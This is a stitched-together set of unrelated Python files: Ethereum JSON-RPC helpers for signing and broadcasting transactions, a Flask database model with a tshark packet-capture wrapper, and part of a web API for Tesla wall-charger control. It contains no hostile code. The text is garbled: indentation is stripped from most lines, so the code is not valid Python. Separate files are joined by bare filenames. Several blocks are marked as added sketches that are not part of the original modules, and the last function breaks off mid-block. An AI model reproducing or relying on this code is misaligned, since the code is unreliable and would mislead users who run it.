# print("SubmitRequest: batchedPayload before setting id = " + str(batchedPayload))
# Set the id if it's not already set
if 'id' not in batchedPayload:
# Set the id to the payload_copyToUse
batchedPayload['id'] = (randint(0, 999999999999999))
# print("SubmitRequest: batchedPayload after setting id = " + str(batchedPayload))
# Clear these block number properties. Make sure block properties like 'latest', 'pending', etc are not in the params
RemovePropertyFromPayloadParams('latest', batchedPayload)
RemovePropertyFromPayloadParams('pending', batchedPayload)
RemovePropertyFromPayloadParams('earliest', batchedPayload)
blockNumberParamIsRequired = True
if not payloadIsBatched:
method = payload_copyToUse['method']
if not RpcMethodRequiresBlockNumberSpecification(method):
# print("SubmitRequest: not specifying block number for this call because it will throw an error if we do")
blockNumberParamIsRequired = False
else:
for batchedPayload in payload_copyToUse:
method = batchedPayload['method']
# If anyone one of these methods in this batched call behave this way, treat the entire thing this way
if not RpcMethodRequiresBlockNumberSpecification(method):
blockNumberParamIsRequired = False
break
if blockNumberParamIsRequired:
if not blockNumber_toUse:
if not payloadIsBatched:
# We're using only the latest
payload_copyToUse['params'].append('latest')
else:
for batchedPayload in payload_copyToUse:
# We're using only the latest
batchedPayload['params'].append('latest')
else:
if not payloadIsBatched:
# Append the block number to the payload_copyToUse
# print("Before payload_copyToUse = " + str(payload_copyToUse))
payload_copyToUse['params'].append(blockNumber_toUse)
# print("After payload_copyToUse = " + str(payload_copyToUse))
else:
for batchedPayload in payload_copyToUse:
# Append the block number to the batchedPayload
# print("Before batchedPayload = " + str(batchedPayload))
batchedPayload['params'].append(blockNumber_toUse)
# print("After batchedPayload = " + str(batchedPayload))
try:
# print("SubmitRequest: to " + str(url) + " with payload " + str(payload_copyToUse))
# datetimeBefore = datetime.datetime.now()
response = requests.post(url, data=json.dumps(payload_copyToUse), headers=headers, timeout=requestTimeout_seconds)
# duration_s = (datetime.datetime.now() - datetimeBefore).total_seconds()
# print("SubmitRequest: to " + str(url) + " duration_s = " + str(duration_s))
except Exception as ex:
print("exception (unknown) in SubmitRequest: ex = " + str(type(ex)) + ", stacktrace = " + str(traceback.format_exc()))
# # Do not print the stacktrace to logs or i'll get spammed and performance will suffer
response = "wtf"
pass
# response = requests.post(url, data=json.dumps(payload_copyToUse), headers=headers, timeout=requestTimeout_seconds)
# print("SubmitRequest: response = " + str(response))
# print("SubmitRequest: response.content = " + str(response.content) + ", this was for url = " + str(url))
# if there's no lock, just update the resultDict
if not lock_resultDict:
resultDict[resultKey] = response
# Else we have a lock, so let's update the resultDict in a threadsafe way
else:
lock_resultDict.acquire()
try:
resultDict[resultKey] = response
finally:
lock_resultDict.release()
def RpcMethodRequiresBlockNumberSpecification(method):
    # These RPC methods do not take a block-number parameter (no explicit block
    # number and no "latest"/"pending"/"earliest" tag), so return False for
    # them and True for everything else.
    methodsWithoutBlockNumber = {
        'eth_blockNumber',
        'eth_estimateGas',
        'eth_estimategas',
        'eth_getBlockTransactionCountByHash',
        'eth_sendTransaction',
        'eth_sendRawTransaction',
        'eth_sendrawtransaction',
        'eth_getBlockByHash',
        'eth_getBlockByNumber',
        'eth_getTransactionByHash',
        'eth_getTransactionByBlockHashAndIndex',
        'eth_getTransactionReceipt',
        'eth_pendingTransactions',
        'eth_gasPrice',
        'eth_getLogs',
    }
    return method not in methodsWithoutBlockNumber
def Get_RemoteEthereumNodeToUse(url_RemoteNode):
return url_RemoteNode.value
def API_GetTransactionCount(address):
payload = {
"jsonrpc": "2.0",
"method": "eth_getTransactionCount",
"params": [
address,
]
}
# print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, RequestTimeout_seconds,
ResultHandlerDelegate_DetermineHighestResult_int,
True, True)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
# print("API_GetTransactionCount jData = " + str(jData))
transactionCount = ConvertHexToInt(jData['result'])
return transactionCount
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def ResultHandlerDelegate_DetermineHighestResult_int(resultDict):
highestResult = 0
# This function is great because it's going to look at the resultDict which contains many responses and iterate over them and look for the response with the highest result
# This works well for the getting the latest block number as well as getting the latest nonce. In both cases we want the highest value
responseOf_highestResult = None
for resultKey in resultDict:
# PrintAndLog_FuncNameHeader("resultKey = " + str(resultKey) + ": resultDict[resultKey] = " + str(resultDict[resultKey]))
if hasattr(resultDict[resultKey], 'content'):
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
# PrintAndLog_FuncNameHeader("jData = " + str(jData))
# If the result is valid
if 'result' in jData and jData['result'] and str(jData['result']).lower() != "null" and str(jData['result']).lower() != "none":
result = ConvertHexToInt(jData['result'])
# PrintAndLog_FuncNameHeader("jData['result'] = " + str(jData['result']) + ", " + str(result) + " " + str(resultKey))
if result > highestResult:
# PrintAndLog_FuncNameHeader("found a new highest result " + str(result) + ", " + str(resultKey))
highestResult = result
responseOf_highestResult = resultDict[resultKey]
# else:
# PrintAndLog_FuncNameHeader("found a result " + str(
# result) + ", but it didn't exceed our current highest of " + str(highestResult) + " " + str(resultKey))
return responseOf_highestResult
def API_SendRawTransaction_ToManyRemoteNodes(transactionData):
from Libraries.nodes import RemoteNodeList
threads = []
resultsDict = {}
# Send to all standard RPC nodes
for remoteNode in RemoteNodeList:
key = str(remoteNode.name)
t = threading.Thread(target=API_PostSendRawTransaction_StandardRPC, args=(transactionData, Get_RemoteEthereumNodeToUse(remoteNode), resultsDict, key))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print("resultsDict = " + str(resultsDict))
# print("resultsDict.values() = " + str(resultsDict.values()))
numOfTransactionIdsInResultsDict = 0
for key, txId in list(resultsDict.items()):
if IsStringATransactionId(txId):
numOfTransactionIdsInResultsDict += 1
print("numOfTransactionIdsInResultsDict = " + str(numOfTransactionIdsInResultsDict))
# If all of these responses are the same, then we can just reference the first one
if AllListItemsAreTheSame(list(resultsDict.values())):
print("All items are the same")
txId = list(resultsDict.values())[0]
if IsStringATransactionId(txId):
print("Using txId = " + txId)
return txId, None
else:
message = "API_PostSendRawTransaction_ToManyRemoteNodes invalid txId (A) " + str(txId)
print(message)
# All responses are not the same
else:
print("All items are NOT the same")
for key, txId in list(resultsDict.items()):
if IsStringATransactionId(txId):
print("Using txId = " + txId)
return txId, None
else:
message = "API_PostSendRawTransaction_ToManyRemoteNodes invalid txId (B) " + str(txId)
print(message)
return None, None
def API_PostSendRawTransaction_StandardRPC(transactionData, url, result, key):
shortName = url[0:20]
result[key] = None
try:
payload = {
"id": randint(0, 99999999999999),
"jsonrpc": "2.0",
"method": "eth_sendRawTransaction",
"params": [
"0x" + transactionData
]
}
# print("API_PostSendRawTransaction_StandardRPC " + shortName)
response = requests.post(url, data=json.dumps(payload), headers=Headers, timeout=RequestTimeout_seconds)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
print("API_PostSendRawTransaction_StandardRPC " + shortName + " jData = " + str(jData))
if 'error' in jData:
errorMessage = jData['error']['message']
errorCode = jData['error']['code']
# print("API_PostSendRawTransaction_StandardRPC " + shortName + " errorMessage: " + errorMessage + ". errorCode: " + str(errorCode))
result[key] = jData['error']
elif 'result' in jData:
# print("API_PostSendRawTransaction_StandardRPC " + shortName + " jData = " + str(jData))
transactionId = str(jData['result'])
result[key] = transactionId
else:
print("No error or result in the response!")
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
    except Exception:
print("exception = " + traceback.format_exc())
pass
return result
def API_EstimateGas(toAddress, fromAddress, data, value=0, doAddExtraGasPadding=True, multiplier=1.22, timeout=RequestTimeout_seconds):
value_hex = '0x' + ConvertIntToHex(int(value))
payload = {
"jsonrpc": "2.0",
"method": "eth_estimateGas",
"params": [
{
"data": data,
"to": toAddress,
"from": fromAddress,
"value": value_hex,
},
]
}
if not toAddress:
del payload['params'][0]['to']
print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, timeout)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
# print("jData = " + str(jData))
estimatedGasUsage_wei = ConvertHexToInt(jData['result'])
# print("estimatedGasUsage_wei = " + str(estimatedGasUsage_wei))
if doAddExtraGasPadding:
estimatedGasUsage_wei = int(estimatedGasUsage_wei * multiplier)
# print("adding some extra gas as padding, estimatedGasUsage_wei = " + str(
# estimatedGasUsage_wei) + " after a multiplier of " + str(multiplier) + " was used")
return estimatedGasUsage_wei
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def IsAddressAValidDeployedContract(toAddress):
try:
result = API_GetCode(toAddress)
if result != '0x':
return True
except (KeyboardInterrupt, SystemExit):
print('\nkeyboard interrupt caught')
print('\n...Program Stopped Manually!')
raise
    except Exception:
message = "exception: " + traceback.format_exc()
print(message)
pass
return False
def API_GetCode(toAddress):
payload = {
"jsonrpc": "2.0",
"method": "eth_getCode",
"params": [
toAddress,
]
}
# print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, RequestTimeout_seconds)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
return jData['result']
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def SignTransaction(to, value, privkey, nonce=0, gas_int=21000, gasPrice_int=1010000000, data_hex=""):
# print("SignTransaction gasPrice_int = " + str(ConvertWeiToGwei(gasPrice_int)) + " gwei")
if not isinstance(gasPrice_int, int):
raise Exception("gasPrice_int must be of type int")
if gasPrice_int <= 0:
raise Exception("gasPrice_int cannot be negative or zero")
if not isinstance(gas_int, int):
raise Exception("gas_int must be of type int")
if gas_int <= 0:
raise Exception("gas_int cannot be negative or zero")
try:
data_hex_with0xRemoved = data_hex.replace("0x", "")
data = bytes.fromhex(data_hex_with0xRemoved)
# Results in {'error': True, 'message': ObjectSerializationError('Serialization failed because of field data ("Object is not a serializable (<class \'bytearray\'>)")',)}
# data = bytearray.fromhex('deadbeef')
# print("SignTransaction data = " + str(data))
unsigned_transaction = transactions.Transaction(nonce, gasPrice_int, gas_int, to, value, data)
# print("unsigned_transaction = " + str(unsigned_transaction))
raw_transaction_bytes = rlp.encode(unsigned_transaction.sign(privkey))
# print("raw_transaction_bytes = " + str(raw_transaction_bytes))
raw_transaction_hex = Web3.toHex(raw_transaction_bytes)
# print("raw_transaction_hex = " + str(raw_transaction_hex))
raw_transaction_hex_0xRemoved = raw_transaction_hex.replace("0x", "")
# print("raw_transaction_hex_0xRemoved = " + raw_transaction_hex_0xRemoved)
return {'error': False, 'sign': raw_transaction_hex_0xRemoved}
except Exception as msg:
return {'error': True, 'message': msg}
def GetNullAddress():
# NullAddress = Instance_Web3.toChecksumAddress("0x0000000000000000000000000000000000000000")
from Libraries.nodes import Instance_Web3
return Instance_Web3.toChecksumAddress("0x0000000000000000000000000000000000000000")
def GetEtherContractAddress():
# EtherContractAddress = NullAddress
return GetNullAddress()
def GetAddressFromDataProperty(dataProperty):
return '0x' + dataProperty[-LengthOfPublicAddress_Excludes0x:]
def SplitStringIntoChunks(myStringIWantToSplit, splitLength):
splitArray = [myStringIWantToSplit[i:i + splitLength] for i in range(0, len(myStringIWantToSplit), splitLength)]
return splitArray
def ConvertGweiToWei(gwei):
return int(gwei * 1000000000)
def ConvertWeiToGwei(wei):
return wei / float(1000000000)
def ConvertHexToInt(hex):
return int(hex, 16)
def IsStringATransactionId(myString):
if not myString:
return False
if "0x" in str(myString) and len(str(myString)) != LengthOfTransactionHash_Including0x:
return False
if "0x" not in str(myString) and len(str(myString)) != LengthOfTransactionHash_Excludes0x:
return False
return True
def AllListItemsAreTheSame(items):
return all(x == items[0] for x in items)
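# Hedged usage sketch (not part of the original module): builds a JSON-RPC
# payload the same way API_GetTransactionCount does above and sends it to all
# nodes. The method here (eth_getBalance) and any address passed in are
# illustrative assumptions.
def Example_API_GetBalance(address):
    payload = {
        "jsonrpc": "2.0",
        "method": "eth_getBalance",
        "params": [
            address,
        ]
    }
    response = SendRequestToAllNodes(payload, Headers, RequestTimeout_seconds)
    if response.ok:
        jData = json.loads(response.content)
        return ConvertHexToInt(jData['result'])
    else:
        # If response code is not ok (200), raise the resulting http error
        response.raise_for_status()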
models.py
from flask_sqlalchemy import SQLAlchemy
from threading import Thread
import subprocess
import shlex
import sys
import io
import json
from encoder import JsonEncodedDict
from pathlib import Path
from datetime import datetime
db = SQLAlchemy()
class Devices(db.Model):
__tablename__ = 'devices'
public_ip = db.Column(db.String(15), db.ForeignKey('networks.public_ip'))
device_ip = db.Column(db.String(15), primary_key=True)
port_status = db.Column(db.String(100))
MAC_address = db.Column(db.String(17))
manufacturer = db.Column(db.String(100))
service_info = db.Column(db.String(150))
os_details = db.Column(db.String(150))
open_ports = db.Column(JsonEncodedDict)
warnings = db.Column(db.String(150))
def __init__(self, public_ip, device_ip, port_status, MAC_address, manufacturer, service_info, os_details, open_ports, warnings):
self.public_ip = public_ip
self.device_ip = device_ip
self.port_status = port_status
self.MAC_address = MAC_address
self.manufacturer = manufacturer
self.service_info = service_info
self.os_details = os_details
self.open_ports = open_ports
self.warnings = warnings
class Network(db.Model):
__tablename__ = 'networks'
public_ip = db.Column(db.String(15), primary_key=True)
ip_country = db.Column(db.String(100))
country_cc = db.Column(db.String(5))
gateway_ip = db.Column(db.String(15))
def __init__(self, public_ip, ip_country, country_cc, gateway_ip):
self.public_ip = public_ip
self.ip_country = ip_country
self.country_cc = country_cc
self.gateway_ip = gateway_ip
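# Hedged usage sketch (not part of the original module): creating and storing
# one Network row and one Devices row. All field values are illustrative
# placeholders, and db must already be bound to a Flask app.
def _example_store_scan_result():
    network = Network('203.0.113.10', 'Example Country', 'EX', '192.168.1.1')
    device = Devices('203.0.113.10', '192.168.1.42', 'up', 'AA:BB:CC:DD:EE:FF',
                     'Example Manufacturer', '80/tcp http', 'Linux 5.x',
                     {'80': 'http', '443': 'https'}, 'none')
    db.session.add(network)
    db.session.add(device)
    db.session.commit()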
class PacketSniffer:
def run_tshark(self, args):
print("tshark test with {}.".format(args[0]))
filepath = args[1]
cmd = "tshark -l -i " + args[0] + " -w " + filepath
run_args = shlex.split(cmd)
tshark = subprocess.Popen(run_args, stdout=subprocess.PIPE)
def run(self, args):
try:
t = Thread(target=self.run_tshark, args=(args, ))
t.daemon = True
t.start()
t.join()
except Exception as e:
return str(e)
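# Hedged usage sketch (not part of the original module): PacketSniffer.run
# expects args[0] to be the capture interface and args[1] the output capture
# file, as used by run_tshark above. The interface name and path below are
# illustrative assumptions.
def _example_start_capture():
    sniffer = PacketSniffer()
    return sniffer.run(['eth0', '/tmp/example_capture.pcap'])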
HTTPControl.py
import logging
import mimetypes
import os
import pathlib
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from datetime import datetime, timedelta
import jinja2
import json
import re
import threading
import time
import urllib.parse
import uuid
import math
from ww import f
logger = logging.getLogger(__name__.rsplit(".")[-1])
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class HTTPControl:
configConfig = {}
configHTTP = {}
httpPort = 8080
master = None
status = False
def __init__(self, master):
self.master = master
try:
self.configConfig = master.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHTTP = master.config["control"]["HTTP"]
except KeyError:
self.configHTTP = {}
self.httpPort = self.configHTTP.get("listenPort", 8080)
self.status = self.configHTTP.get("enabled", False)
# Unload if this module is disabled or misconfigured
if (not self.status) or (int(self.httpPort) < 1):
self.master.releaseModule("lib.TWCManager.Control", self.__class__.__name__)
return None
HTTPHandler = CreateHTTPHandlerClass(master)
httpd = None
try:
httpd = ThreadingSimpleServer(("", self.httpPort), HTTPHandler)
except OSError as e:
logger.error("Unable to start HTTP Server: " + str(e))
if httpd:
logger.info("Serving at port: " + str(self.httpPort))
threading.Thread(target=httpd.serve_forever, daemon=True).start()
else:
self.master.releaseModule("lib.TWCManager.Control", self.__class__.__name__)
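# Hedged sketch (not part of the original module) of the configuration keys
# HTTPControl reads above: only "enabled" and "listenPort" under
# config["control"]["HTTP"] are used here. The values are illustrative.
EXAMPLE_HTTP_CONTROL_CONFIG = {
    "config": {},
    "control": {
        "HTTP": {
            "enabled": True,
            "listenPort": 8080,
        }
    },
}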
def CreateHTTPHandlerClass(master):
class HTTPControlHandler(BaseHTTPRequestHandler):
ampsList = []
fields = {}
hoursDurationList = []
master = None
path = ""
post_data = ""
templateEnv = None
templateLoader = None
timeList = []
url = None
def __init__(self, *args, **kwargs):
# Populate ampsList so that any function which requires a list of supported
# TWC amps can easily access it
if not len(self.ampsList):
self.ampsList.append([0, "Disabled"])
for amp in range(
5, (master.config["config"].get("wiringMaxAmpsPerTWC", 5)) + 1
):
self.ampsList.append([amp, str(amp) + "A"])
# Populate list of hours
if not len(self.hoursDurationList):
for hour in range(1, 25):
self.hoursDurationList.append([(hour * 3600), str(hour) + "h"])
if not len(self.timeList):
for hour in range(0, 24):
for mins in [0, 15, 30, 45]:
strHour = str(hour)
strMins = str(mins)
if hour < 10:
strHour = "0" + str(hour)
if mins < 10:
strMins = "0" + str(mins)
self.timeList.append(
[strHour + ":" + strMins, strHour + ":" + strMins]
)
# Define jinja2 template environment
            # Note that we pass two search paths to the template loader, in priority order.
            # The first is the user-specified theme; the second is the default.
            # Jinja2 will try the specified theme first, and if any files
            # are not found, it will fall back to the default theme.
self.templateLoader = jinja2.FileSystemLoader(
searchpath=[
pathlib.Path(__file__).resolve().parent.as_posix()
+ "/themes/"
+ master.settings.get("webControlTheme", "Modern")
+ "/",
pathlib.Path(__file__).resolve().parent.as_posix()
+ "/themes/Default/",
]
)
self.templateEnv = jinja2.Environment(
loader=self.templateLoader, autoescape=True
)
# Make certain functions available to jinja2
            # Where we have helper functions that we've used in the past to
            # render HTML, we can keep using those even inside jinja2
self.templateEnv.globals.update(addButton=self.addButton)
self.templateEnv.globals.update(ampsList=self.ampsList)
self.templateEnv.globals.update(chargeScheduleDay=self.chargeScheduleDay)
self.templateEnv.globals.update(checkBox=self.checkBox)
self.templateEnv.globals.update(doChargeSchedule=self.do_chargeSchedule)
self.templateEnv.globals.update(
getMFADevices=master.getModuleByName("TeslaAPI").getMFADevices
)
self.templateEnv.globals.update(hoursDurationList=self.hoursDurationList)
self.templateEnv.globals.update(navbarItem=self.navbar_item)
self.templateEnv.globals.update(optionList=self.optionList)
self.templateEnv.globals.update(timeList=self.timeList)
# Set master object
self.master = master
# Call parent constructor last, this is where the request is served
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def checkBox(self, name, value):
cb = "<input type=checkbox name='" + name + "'"
if value:
cb += " checked"
cb += ">"
return cb
def do_chargeSchedule(self):
schedule = [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
]
settings = master.settings.get("Schedule", {})
page = """
<table class='table table-sm'>
<thead>
<th scope='col'> </th>
"""
for day in schedule:
page += "<th scope='col'>" + day[:3] + "</th>"
page += """
</thead>
<tbody>"""
for i in (x for y in (range(6, 24), range(0, 6)) for x in y):
page += "<tr><th scope='row'>%02d</th>" % (i)
for day in schedule:
today = settings.get(day, {})
curday = settings.get("Common", {})
if settings.get("schedulePerDay", 0):
curday = settings.get(day, {})
if (
today.get("enabled", None) == "on"
and (int(curday.get("start", 0)[:2]) <= int(i))
and (int(curday.get("end", 0)[:2]) >= int(i))
):
page += (
"<td bgcolor='#CFFAFF'>SC @ "
+ str(
settings.get("Settings", {}).get("scheduledAmpsMax", 0)
)
+ "A</td>"
)
else:
# Todo - need to mark track green + non scheduled chg
page += "<td bgcolor='#FFDDFF'> </td>"
page += "</tr>"
page += "</tbody>"
page += "</table>"
return page
def navbar_item(self, url, name, target="_self"):
active = ""
urlp = urllib.parse.urlparse(self.path)
if urlp.path == url:
active = "active"
page = "<li class='nav-item %s'>" % active
page += "<a class='nav-link' target='%s' href='%s'>%s</a>" % (
target,
url,
name,
)
page += "</li>"
return page
def do_API_GET(self):
self.debugLogAPI("Starting API GET")
if self.url.path == "/api/getConfig":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(master.config)
# Scrub output of passwords and API keys
json_datas = re.sub(r'"password": ".*?",', "", json_data)
json_data = re.sub(r'"apiKey": ".*?",', "", json_datas)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getConsumptionOffsets":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
if not master.settings.get("consumptionOffset", None):
master.settings["consumptionOffset"] = {}
json_data = json.dumps(master.settings["consumptionOffset"])
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getLastTWCResponse":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(str(master.lastTWCResponseMsg).encode("utf-8"))
elif self.url.path == "/api/getPolicy":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(master.getModuleByName("Policy").charge_policy)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getSlaveTWCs":
data = {}
totals = {
"lastAmpsOffered": 0,
"lifetimekWh": 0,
"maxAmps": 0,
"reportedAmpsActual": 0,
}
for slaveTWC in master.getSlaveTWCs():
TWCID = "%02X%02X" % (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
data[TWCID] = {
"currentVIN": slaveTWC.currentVIN,
"lastAmpsOffered": round(slaveTWC.lastAmpsOffered, 2),
"lastHeartbeat": round(time.time() - slaveTWC.timeLastRx, 2),
"carsCharging": slaveTWC.isCharging,
"lastVIN": slaveTWC.lastVIN,
"lifetimekWh": slaveTWC.lifetimekWh,
"maxAmps": float(slaveTWC.maxAmps),
"reportedAmpsActual": float(slaveTWC.reportedAmpsActual),
"chargerLoadInW": round(slaveTWC.getCurrentChargerLoad()),
"state": slaveTWC.reportedState,
"version": slaveTWC.protocolVersion,
"voltsPhaseA": slaveTWC.voltsPhaseA,
"voltsPhaseB": slaveTWC.voltsPhaseB,
"voltsPhaseC": slaveTWC.voltsPhaseC,
"TWCID": "%s" % TWCID,
}
if slaveTWC.lastChargingStart > 0:
data[TWCID]["chargeTime"] = str(
timedelta(
seconds=(time.time() - slaveTWC.lastChargingStart)
)
).split(".")[0]
else:
data[TWCID]["chargeTime"] = "--:--:--"
# Adding some vehicle data
vehicle = slaveTWC.getLastVehicle()
if vehicle != None:
data[TWCID]["lastBatterySOC"] = vehicle.batteryLevel
data[TWCID]["lastChargeLimit"] = vehicle.chargeLimit
data[TWCID]["lastAtHome"] = vehicle.atHome
data[TWCID]["lastTimeToFullCharge"] = vehicle.timeToFullCharge
totals["lastAmpsOffered"] += slaveTWC.lastAmpsOffered
totals["lifetimekWh"] += slaveTWC.lifetimekWh
totals["maxAmps"] += slaveTWC.maxAmps
totals["reportedAmpsActual"] += slaveTWC.reportedAmpsActual
data["total"] = {
"lastAmpsOffered": round(totals["lastAmpsOffered"], 2),
"lifetimekWh": totals["lifetimekWh"],
"maxAmps": totals["maxAmps"],
"reportedAmpsActual": round(totals["reportedAmpsActual"], 2),
"TWCID": "total",
}
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getStatus":
data = master.getStatus()
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
try:
self.wfile.write(json_data.encode("utf-8"))
except BrokenPipeError:
self.debugLogAPI("Connection Error: Broken Pipe")
elif self.url.path == "/api/getHistory":
output = []
now = datetime.now().replace(second=0, microsecond=0).astimezone()
startTime = now - timedelta(days=2) + timedelta(minutes=5)
endTime = now.replace(minute=math.floor(now.minute / 5) * 5)
startTime = startTime.replace(
minute=math.floor(startTime.minute / 5) * 5
)
source = (
master.settings["history"] if "history" in master.settings else []
)
data = {
k: v for k, v in source if datetime.fromisoformat(k) >= startTime
}
avgCurrent = 0
for slave in master.getSlaveTWCs():
avgCurrent += slave.historyAvgAmps
data[endTime.isoformat(timespec="seconds")] = master.convertAmpsToWatts(
avgCurrent
)
output = [
{
"timestamp": timestamp,
"charger_power": data[timestamp] if timestamp in data else 0,
}
for timestamp in [
(startTime + timedelta(minutes=5 * i)).isoformat(
timespec="seconds"
)
for i in range(48 * 12)
]
]
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(output)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getUUID":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(str(uuid.getnode()).encode("utf-8"))
else:
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
self.debugLogAPI("Ending API GET")
def do_API_POST(self):
self.debugLogAPI("Starting API POST")
if self.url.path == "/api/addConsumptionOffset":
data = {}
try:
    data = json.loads(self.post_data.decode("UTF-8"))
except (ValueError, UnicodeDecodeError):
    # json.decoder.JSONDecodeError is a ValueError subclass, so this also
    # catches malformed JSON; reject the request and stop processing.
    self.send_response(400)
    self.end_headers()
    self.wfile.write("".encode("utf-8"))
    return
name = str(data.get("offsetName", None))
value = float(data.get("offsetValue", 0))
unit = str(data.get("offsetUnit", ""))
if (
name
and value
and (unit == "A" or unit == "W")
and len(name) < 32
and not self.checkForUnsafeCharactters(name)
):
if not master.settings.get("consumptionOffset", None):
master.settings["consumptionOffset"] = {}
master.settings["consumptionOffset"][name] = {}
master.settings["consumptionOffset"][name]["value"] = value
master.settings["consumptionOffset"][name]["unit"] = unit
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/chargeNow":
data = {}
try:
    data = json.loads(self.post_data.decode("UTF-8"))
except (ValueError, UnicodeDecodeError):
    # Also covers json.decoder.JSONDecodeError (a ValueError subclass);
    # stop processing after rejecting the malformed request.
    self.send_response(400)
    self.end_headers()
    self.wfile.write("".encode("utf-8"))
    return
rate = int(data.get("chargeNowRate", 0))
durn = int(data.get("chargeNowDuration", 0))
if rate <= 0 or durn <= 0:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
master.setChargeNowAmps(rate)
master.setChargeNowTimeEnd(durn)
master.queue_background_task({"cmd": "saveSettings"})
master.getModuleByName("Policy").applyPolicyImmediately()
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/cancelChargeNow":
master.resetChargeNowAmps()
master.queue_background_task({"cmd": "saveSettings"})
master.getModuleByName("Policy").applyPolicyImmediately()
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/checkArrival":
master.queue_background_task({"cmd": "checkArrival"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/checkDeparture":
master.queue_background_task({"cmd": "checkDeparture"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/deleteConsumptionOffset":
data = json.loads(self.post_data.decode("UTF-8"))
name = str(data.get("offsetName", None))
if master.settings.get("consumptionOffset", None):
del master.settings["consumptionOffset"][name]
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/saveSettings":
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendDebugCommand":
data = json.loads(self.post_data.decode("UTF-8"))
packet = {"Command": data.get("commandName", "")}
if data.get("commandName", "") == "Custom":
packet["CustomCommand"] = data.get("customCommand", "")
# Clear last TWC response, so we can grab the next response
master.lastTWCResponseMsg = bytearray()
# Send packet to network
master.getModuleByName("RS485").send(
master.getModuleByName("TWCProtocol").createMessage(packet)
)
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendStartCommand":
master.sendStartCommand()
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendStopCommand":
master.sendStopCommand()
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/setSetting":
data = json.loads(self.post_data.decode("UTF-8"))
setting = str(data.get("setting", None))
value = str(data.get("value", None))
if (
setting
and value
and not self.checkForUnsafeCharactters(setting)
and not self.checkForUnsafeCharactters(value)
):
master.settings[setting] = value
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/setScheduledChargingSettings":
data = json.loads(self.post_data.decode("UTF-8"))
enabled = bool(data.get("enabled", False))
startingMinute = int(data.get("startingMinute", -1))
endingMinute = int(data.get("endingMinute", -1))
monday = bool(data.get("monday", False))
tuesday = bool(data.get("tuesday", False))
wednesday = bool(data.get("wednesday", False))
thursday = bool(data.get("thursday", False))
friday = bool(data.get("friday", False))
saturday = bool(data.get("saturday", False))
sunday = bool(data.get("sunday", False))
amps = int(data.get("amps", -1))
batterySize = int(
    data.get("flexBatterySize", 100)
)  # default to 100 so that every car available at the moment should finish charging by the ending time
flexStart = int(data.get("flexStartEnabled", False))
weekDaysBitmap = (
(1 if monday else 0)
+ (2 if tuesday else 0)
+ (4 if wednesday else 0)
+ (8 if thursday else 0)
+ (16 if friday else 0)
+ (32 if saturday else 0)
+ (64 if sunday else 0)
)
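# Worked example of the bitmap above: a schedule enabled for Monday,
# Wednesday and Friday encodes as 1 + 4 + 16 = 21 (binary 0010101).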
if (
not (enabled)
or startingMinute < 0
or endingMinute < 0
or amps <= 0
or weekDaysBitmap == 0
):
master.setScheduledAmpsMax(0)
master.setScheduledAmpsStartHour(-1)
master.setScheduledAmpsEndHour(-1)
master.setScheduledAmpsDaysBitmap(0)
else:
master.setScheduledAmpsMax(amps)
master.setScheduledAmpsStartHour(startingMinute / 60)
master.setScheduledAmpsEndHour(endingMinute / 60)
master.setScheduledAmpsDaysBitmap(weekDaysBitmap)
master.setScheduledAmpsBatterySize(batterySize)
master.setScheduledAmpsFlexStart(flexStart)
